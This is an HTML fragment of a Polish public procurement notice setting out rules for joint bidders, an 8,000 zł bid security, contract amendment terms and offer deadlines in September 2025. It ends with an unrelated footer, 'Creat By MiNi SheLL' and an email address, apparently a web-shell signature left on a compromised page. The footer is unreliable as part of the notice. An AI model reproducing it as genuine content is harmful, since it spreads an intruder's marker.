doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonują roboty budowlane lub usługi, <br/>do których te zdolności są wymagane. W przypadku, o którym mowa powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 8.000,00 zł - przed upływem terminu składania ofert określonym w SWZ.<br/>Wadium może być wnoszone w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Informacje dotyczące wadium znajdują się w punkcie 10 dodatkowych postanowień SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4 ustawy Pzp, z zachowaniem<br/>przepisów art. 109 ust. 3, art. 110, art. 111 ustawy Pzp oraz nie może podlegać wykluczeniu na podstawie art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego, natomiast spełnienie warunków udziału w postępowaniu Wykonawcy<br/>wykazują zgodnie z pkt 2.1.2 SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt. 3.1. SWZ<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postepowaniu lub kryteriów selekcji.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego<br/>złożyć dokumenty i oświadczenia, o których mowa w pkt 3.5. SWZ, przy czym:<br/>1) dokumenty i oświadczenia, o których mowa w pkt 3.5.1. SWZ składa odpowiednio Wykonawca, który wykazuje spełnianie<br/>warunku, w zakresie i na zasadach opisanych w pkt 2.1.2 SWZ.<br/>2) dokumenty i oświadczenia, o których mowa w pkt 3.5.2 SWZ składa każdy z nich. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, składają oświadczenie, z którego wynika,<br/>które usługi będą wykonywać poszczególni Wykonawcy – załącznik nr 4 do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w § 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy umieścić na platformie zakupowej pod adresem: https://namyslow.ezamawiajacy.pl/app/login w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com